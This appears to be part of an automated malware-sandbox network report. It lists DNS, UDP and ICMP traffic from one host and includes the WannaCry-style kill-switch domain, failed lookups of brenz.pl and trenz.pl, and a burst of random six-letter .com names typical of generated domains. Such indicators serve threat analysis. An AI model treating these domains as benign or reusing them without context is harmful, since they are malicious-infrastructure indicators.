Jan 15, 2025 16:59:08.570728064 CET	53	50831	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.581228018 CET	53	61911	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.741024971 CET	53	56087	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.909763098 CET	53	57103	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.919416904 CET	53	55148	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:08.931802034 CET	53	53645	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:09.094412088 CET	53	51311	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:09.110802889 CET	53	56884	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:12.099358082 CET	53	53702	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:12.110275984 CET	53	62303	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:12.120338917 CET	53	62313	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:12.276958942 CET	53	61031	1.1.1.1	192.168.2.8
Jan 15, 2025 16:59:12.287694931 CET	53	56244	1.1.1.1	192.168.2.8

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 15, 2025 16:58:49.705734968 CET	192.168.2.8	1.1.1.1	c222	(Port unreachable)	Destination Unreachable
Jan 15, 2025 16:59:09.300976038 CET	192.168.2.8	1.1.1.1	c1f4	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 16:57:15.577267885 CET	192.168.2.8	1.1.1.1	0xcb16	Standard query (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:57:28.691143990 CET	192.168.2.8	1.1.1.1	0x1c56	Standard query (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 16:57:15.586266041 CET	1.1.1.1	192.168.2.8	0xcb16	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com		104.16.166.228	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:57:15.586266041 CET	1.1.1.1	192.168.2.8	0xcb16	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com		104.16.167.228	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:57:25.564984083 CET	1.1.1.1	192.168.2.8	0xdd7c	Server failure (2)	ilo.brenz.pl	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:57:25.575037003 CET	1.1.1.1	192.168.2.8	0xf647	Server failure (2)	ant.trenz.pl	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:57:28.700861931 CET	1.1.1.1	192.168.2.8	0x1c56	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com		104.16.167.228	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:57:28.700861931 CET	1.1.1.1	192.168.2.8	0x1c56	No error (0)	www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com		104.16.166.228	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:17.019062996 CET	1.1.1.1	192.168.2.8	0x537f	Server failure (2)	ilo.brenz.pl	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:17.028170109 CET	1.1.1.1	192.168.2.8	0xafda	Server failure (2)	ant.trenz.pl	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.678067923 CET	1.1.1.1	192.168.2.8	0x5ea7	Name error (3)	hiuznf.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.689394951 CET	1.1.1.1	192.168.2.8	0xd882	Name error (3)	qycyhq.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.699764013 CET	1.1.1.1	192.168.2.8	0x1d98	Name error (3)	oljrbm.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.717859983 CET	1.1.1.1	192.168.2.8	0xff1a	Name error (3)	uzgscj.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.740156889 CET	1.1.1.1	192.168.2.8	0x47f5	Name error (3)	izacru.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.751283884 CET	1.1.1.1	192.168.2.8	0x5692	Name error (3)	mhmasr.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.761869907 CET	1.1.1.1	192.168.2.8	0xd3c2	Name error (3)	fofavv.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.772902966 CET	1.1.1.1	192.168.2.8	0x7bda	Name error (3)	vdxosv.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.784063101 CET	1.1.1.1	192.168.2.8	0x1cad	Name error (3)	xdkgwd.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.795430899 CET	1.1.1.1	192.168.2.8	0xa792	Name error (3)	aguuxw.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.808588982 CET	1.1.1.1	192.168.2.8	0xf499	Name error (3)	bnnjpj.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.868117094 CET	1.1.1.1	192.168.2.8	0xb59	Name error (3)	vssqzu.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.883945942 CET	1.1.1.1	192.168.2.8	0xba3a	Name error (3)	aqziks.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.894757032 CET	1.1.1.1	192.168.2.8	0x8864	Name error (3)	eoauui.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:25.970805883 CET	1.1.1.1	192.168.2.8	0x275a	Name error (3)	fjlfoj.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:26.053287983 CET	1.1.1.1	192.168.2.8	0x199e	Name error (3)	imjmns.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:26.129336119 CET	1.1.1.1	192.168.2.8	0x7bfb	Name error (3)	sgucuw.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:26.226914883 CET	1.1.1.1	192.168.2.8	0x69f5	Name error (3)	bzmigs.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:26.237474918 CET	1.1.1.1	192.168.2.8	0xcf78	Name error (3)	efegei.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:26.411426067 CET	1.1.1.1	192.168.2.8	0xad49	Name error (3)	xwowqk.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:26.587388992 CET	1.1.1.1	192.168.2.8	0x57bf	Name error (3)	whmeca.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:26.748153925 CET	1.1.1.1	192.168.2.8	0xaca1	Name error (3)	yjumyc.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:26.759663105 CET	1.1.1.1	192.168.2.8	0xc9b	Name error (3)	eicsxp.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:26.928416967 CET	1.1.1.1	192.168.2.8	0x2c6f	Name error (3)	ybcflo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.089598894 CET	1.1.1.1	192.168.2.8	0xc380	Name error (3)	qfqayo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.099725962 CET	1.1.1.1	192.168.2.8	0x71b7	Name error (3)	tnwywt.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.110449076 CET	1.1.1.1	192.168.2.8	0x749	Name error (3)	onzpwq.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.126667023 CET	1.1.1.1	192.168.2.8	0x49a4	Name error (3)	mpblhc.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.137155056 CET	1.1.1.1	192.168.2.8	0xa7f1	Name error (3)	akkujf.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.148541927 CET	1.1.1.1	192.168.2.8	0x6689	Name error (3)	vixeeq.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.159881115 CET	1.1.1.1	192.168.2.8	0x1602	Name error (3)	vgkebm.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.170531034 CET	1.1.1.1	192.168.2.8	0x9d05	Name error (3)	mmazow.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.180171013 CET	1.1.1.1	192.168.2.8	0x5c87	Name error (3)	rfiiyy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.191492081 CET	1.1.1.1	192.168.2.8	0x1b05	Name error (3)	xmkske.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.361083984 CET	1.1.1.1	192.168.2.8	0x9b30	Name error (3)	uxumpp.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.519859076 CET	1.1.1.1	192.168.2.8	0xaaa2	Name error (3)	uncjvy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.531750917 CET	1.1.1.1	192.168.2.8	0xcb2d	Name error (3)	ikebhe.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.541338921 CET	1.1.1.1	192.168.2.8	0x96ac	Name error (3)	hrospx.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.552525043 CET	1.1.1.1	192.168.2.8	0xb54a	Name error (3)	wbqpcg.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.720545053 CET	1.1.1.1	192.168.2.8	0x2a8b	Name error (3)	lnsrfu.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.731307983 CET	1.1.1.1	192.168.2.8	0x36a9	Name error (3)	izgyem.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.742270947 CET	1.1.1.1	192.168.2.8	0x1ac	Name error (3)	nitrjr.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.751441956 CET	1.1.1.1	192.168.2.8	0x911	Name error (3)	mgknby.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.760987043 CET	1.1.1.1	192.168.2.8	0x8ec4	Name error (3)	tiggay.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.771727085 CET	1.1.1.1	192.168.2.8	0x4a9b	Name error (3)	dwyvvs.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.783482075 CET	1.1.1.1	192.168.2.8	0xfb6c	Name error (3)	xkeubu.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.949646950 CET	1.1.1.1	192.168.2.8	0xa16	Name error (3)	nihrqy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.960237980 CET	1.1.1.1	192.168.2.8	0xc828	Name error (3)	qmfezv.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:27.970500946 CET	1.1.1.1	192.168.2.8	0xb9c5	Name error (3)	zjaxax.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:48.943461895 CET	1.1.1.1	192.168.2.8	0x59e4	Name error (3)	oxuoxj.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:48.953186989 CET	1.1.1.1	192.168.2.8	0x3d23	Name error (3)	yuaame.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:48.963905096 CET	1.1.1.1	192.168.2.8	0x8173	Name error (3)	jqjyrb.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.129981041 CET	1.1.1.1	192.168.2.8	0x2a8b	Name error (3)	epejsq.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.142441034 CET	1.1.1.1	192.168.2.8	0xa013	Name error (3)	jutqhm.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.304966927 CET	1.1.1.1	192.168.2.8	0x4857	Name error (3)	vwfafe.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.315110922 CET	1.1.1.1	192.168.2.8	0xa5d	Name error (3)	aioade.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.326586962 CET	1.1.1.1	192.168.2.8	0x3ee2	Name error (3)	iieiay.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.336996078 CET	1.1.1.1	192.168.2.8	0xbf32	Name error (3)	hycoja.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.498584032 CET	1.1.1.1	192.168.2.8	0x7541	Name error (3)	ybdvhs.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.509875059 CET	1.1.1.1	192.168.2.8	0xabb3	Name error (3)	bitcaa.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.520354986 CET	1.1.1.1	192.168.2.8	0x2bd7	Name error (3)	icvsob.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.861979961 CET	1.1.1.1	192.168.2.8	0x6ecc	Name error (3)	njbjte.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.873217106 CET	1.1.1.1	192.168.2.8	0x773a	Name error (3)	veokda.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.885520935 CET	1.1.1.1	192.168.2.8	0xf036	Name error (3)	rxtiio.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:49.896423101 CET	1.1.1.1	192.168.2.8	0xeed	Name error (3)	uuruou.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.060941935 CET	1.1.1.1	192.168.2.8	0x1fb3	Name error (3)	hnwafy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.071346998 CET	1.1.1.1	192.168.2.8	0x5d86	Name error (3)	riyymn.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.082734108 CET	1.1.1.1	192.168.2.8	0x25d3	Name error (3)	csyyvl.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.093359947 CET	1.1.1.1	192.168.2.8	0xce97	Name error (3)	tcezwt.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.104197979 CET	1.1.1.1	192.168.2.8	0x6a8a	Name error (3)	qudqik.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.114897013 CET	1.1.1.1	192.168.2.8	0x5e9c	Name error (3)	itevsb.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.638041019 CET	1.1.1.1	192.168.2.8	0x1	Name error (3)	ryiyek.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.800045013 CET	1.1.1.1	192.168.2.8	0xa96b	Name error (3)	gyinfa.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.810967922 CET	1.1.1.1	192.168.2.8	0xe0fb	Name error (3)	tvmcoy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.821660042 CET	1.1.1.1	192.168.2.8	0x330e	Name error (3)	ljomqy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.831649065 CET	1.1.1.1	192.168.2.8	0x180d	Name error (3)	eahdry.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.841964960 CET	1.1.1.1	192.168.2.8	0x97aa	Name error (3)	sxsxzp.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:50.852941036 CET	1.1.1.1	192.168.2.8	0x5732	Name error (3)	ekfpve.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.014122963 CET	1.1.1.1	192.168.2.8	0xea1	Name error (3)	ueohif.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.024272919 CET	1.1.1.1	192.168.2.8	0xad4c	Name error (3)	oyewqz.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.034744024 CET	1.1.1.1	192.168.2.8	0xe2fa	Name error (3)	ojnqpy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.194996119 CET	1.1.1.1	192.168.2.8	0x17ba	Name error (3)	evvbut.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.369190931 CET	1.1.1.1	192.168.2.8	0x1f56	Name error (3)	gnyoiq.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.381172895 CET	1.1.1.1	192.168.2.8	0x8c3b	Name error (3)	ofulyt.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.393301010 CET	1.1.1.1	192.168.2.8	0x6ce3	Name error (3)	ncyyfy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.551785946 CET	1.1.1.1	192.168.2.8	0x7b9b	Name error (3)	pqrkoe.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.562875986 CET	1.1.1.1	192.168.2.8	0x495	Name error (3)	luuymi.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.574031115 CET	1.1.1.1	192.168.2.8	0xc57e	Name error (3)	loauaa.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.585158110 CET	1.1.1.1	192.168.2.8	0x9d99	Name error (3)	mizeex.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.594937086 CET	1.1.1.1	192.168.2.8	0xa1fe	Name error (3)	ogykld.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.605928898 CET	1.1.1.1	192.168.2.8	0x7140	Name error (3)	uulevy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.623728991 CET	1.1.1.1	192.168.2.8	0xa447	Name error (3)	fpzsfa.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.633764029 CET	1.1.1.1	192.168.2.8	0x7ad6	Name error (3)	wjaaae.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.649527073 CET	1.1.1.1	192.168.2.8	0xaea2	Name error (3)	yazpuo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.661390066 CET	1.1.1.1	192.168.2.8	0x5a5e	Name error (3)	izyqkd.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.823533058 CET	1.1.1.1	192.168.2.8	0x6d0c	Name error (3)	shooys.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.834578037 CET	1.1.1.1	192.168.2.8	0xc00c	Name error (3)	nthzgn.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:51.845736027 CET	1.1.1.1	192.168.2.8	0xae92	Name error (3)	yhnour.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:52.012582064 CET	1.1.1.1	192.168.2.8	0x2fa7	Name error (3)	eafaww.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:52.023865938 CET	1.1.1.1	192.168.2.8	0x9aff	Name error (3)	dccqyp.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:52.034324884 CET	1.1.1.1	192.168.2.8	0x4852	Name error (3)	wvonfn.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:58:52.045413971 CET	1.1.1.1	192.168.2.8	0x4c79	Name error (3)	jbkunk.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.208797932 CET	1.1.1.1	192.168.2.8	0xaeff	Name error (3)	nnezan.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.224262953 CET	1.1.1.1	192.168.2.8	0xab6f	Name error (3)	eoylnw.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.237534046 CET	1.1.1.1	192.168.2.8	0x7f9b	Name error (3)	jdbpht.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.249871969 CET	1.1.1.1	192.168.2.8	0x197c	Name error (3)	sliweo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.260696888 CET	1.1.1.1	192.168.2.8	0x9a26	Name error (3)	jyxidj.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.271836042 CET	1.1.1.1	192.168.2.8	0x284e	Name error (3)	wiybwa.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.282334089 CET	1.1.1.1	192.168.2.8	0xe305	Name error (3)	afvqcy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.441374063 CET	1.1.1.1	192.168.2.8	0xfaa7	Name error (3)	favteu.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.606719017 CET	1.1.1.1	192.168.2.8	0x9566	Name error (3)	jidduv.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.617566109 CET	1.1.1.1	192.168.2.8	0x16d	Name error (3)	yntfrh.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.629246950 CET	1.1.1.1	192.168.2.8	0x94c9	Name error (3)	vdxuni.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.639729023 CET	1.1.1.1	192.168.2.8	0x712a	Name error (3)	pduhba.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.812975883 CET	1.1.1.1	192.168.2.8	0x5532	Name error (3)	unclto.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.825613022 CET	1.1.1.1	192.168.2.8	0xdc54	Name error (3)	qxvfaq.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.836265087 CET	1.1.1.1	192.168.2.8	0xe70b	Name error (3)	veuibo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:06.846323967 CET	1.1.1.1	192.168.2.8	0x466	Name error (3)	fsbczk.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.010788918 CET	1.1.1.1	192.168.2.8	0x3b07	Name error (3)	bevtua.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.022918940 CET	1.1.1.1	192.168.2.8	0xa834	Name error (3)	ufpirp.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.033428907 CET	1.1.1.1	192.168.2.8	0x8cc7	Name error (3)	azmakv.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.044606924 CET	1.1.1.1	192.168.2.8	0x68a7	Name error (3)	euieic.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.059453011 CET	1.1.1.1	192.168.2.8	0xadd1	Name error (3)	oegiuo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.218390942 CET	1.1.1.1	192.168.2.8	0x126e	Name error (3)	ueqfel.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.381973028 CET	1.1.1.1	192.168.2.8	0x1209	Name error (3)	audccc.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.392991066 CET	1.1.1.1	192.168.2.8	0xb817	Name error (3)	ielyae.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.402645111 CET	1.1.1.1	192.168.2.8	0x8f84	Name error (3)	xeuyzh.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.413516045 CET	1.1.1.1	192.168.2.8	0xb58f	Name error (3)	ukmeqc.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.575265884 CET	1.1.1.1	192.168.2.8	0xb3e	Name error (3)	ttilzo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.732688904 CET	1.1.1.1	192.168.2.8	0x6e8	Name error (3)	uxuxpl.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.745672941 CET	1.1.1.1	192.168.2.8	0xf27c	Name error (3)	oloroz.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.759087086 CET	1.1.1.1	192.168.2.8	0xc405	Name error (3)	qxkaoo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.770684004 CET	1.1.1.1	192.168.2.8	0x5792	Name error (3)	txsueo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.782800913 CET	1.1.1.1	192.168.2.8	0xc6f5	Name error (3)	rtkhyx.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.940789938 CET	1.1.1.1	192.168.2.8	0x83f8	Name error (3)	cmyayw.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.951905966 CET	1.1.1.1	192.168.2.8	0x239d	Name error (3)	xfqora.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:07.962873936 CET	1.1.1.1	192.168.2.8	0x3619	Name error (3)	lnwfpg.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.122174025 CET	1.1.1.1	192.168.2.8	0xc5f8	Name error (3)	snjiwm.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.281109095 CET	1.1.1.1	192.168.2.8	0x3826	Name error (3)	nfieuq.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.411401033 CET	1.1.1.1	192.168.2.8	0x359d	Server failure (2)	ilo.brenz.pl	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.420593023 CET	1.1.1.1	192.168.2.8	0xa2cb	Server failure (2)	ant.trenz.pl	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.446822882 CET	1.1.1.1	192.168.2.8	0x1449	Name error (3)	dwqzxj.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.457202911 CET	1.1.1.1	192.168.2.8	0x32f1	Name error (3)	uayyyl.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.467772961 CET	1.1.1.1	192.168.2.8	0xcc3b	Name error (3)	kpxpnm.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.478197098 CET	1.1.1.1	192.168.2.8	0x3d84	Name error (3)	xuuvfo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.488238096 CET	1.1.1.1	192.168.2.8	0x6d25	Name error (3)	pvjita.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.498240948 CET	1.1.1.1	192.168.2.8	0xed66	Name error (3)	ubumrx.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.507699013 CET	1.1.1.1	192.168.2.8	0xe1d8	Name error (3)	tytzka.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.519346952 CET	1.1.1.1	192.168.2.8	0xa126	Name error (3)	uooqwj.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.530193090 CET	1.1.1.1	192.168.2.8	0xda22	Name error (3)	jseegc.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.541234970 CET	1.1.1.1	192.168.2.8	0xc2c8	Name error (3)	uxwoff.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.551254034 CET	1.1.1.1	192.168.2.8	0x57dd	Name error (3)	nfiyae.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.561302900 CET	1.1.1.1	192.168.2.8	0xc689	Name error (3)	kqpejd.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.570728064 CET	1.1.1.1	192.168.2.8	0x8ebc	Name error (3)	qovfco.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.581228018 CET	1.1.1.1	192.168.2.8	0x524b	Name error (3)	iofiur.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.741024971 CET	1.1.1.1	192.168.2.8	0xdc38	Name error (3)	hsvhuy.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.909763098 CET	1.1.1.1	192.168.2.8	0x2203	Name error (3)	ytvutb.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.919416904 CET	1.1.1.1	192.168.2.8	0xa920	Name error (3)	ylotge.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:08.931802034 CET	1.1.1.1	192.168.2.8	0x856f	Name error (3)	kyfjqk.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:09.094412088 CET	1.1.1.1	192.168.2.8	0x1a75	Name error (3)	uasnos.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 16:59:09.110802889 CET	1.1.1.1	192.168.2.8	0x4dba	Name error (3)	ttedws.com	none	none	A (IP address)	IN (0x0001)	false
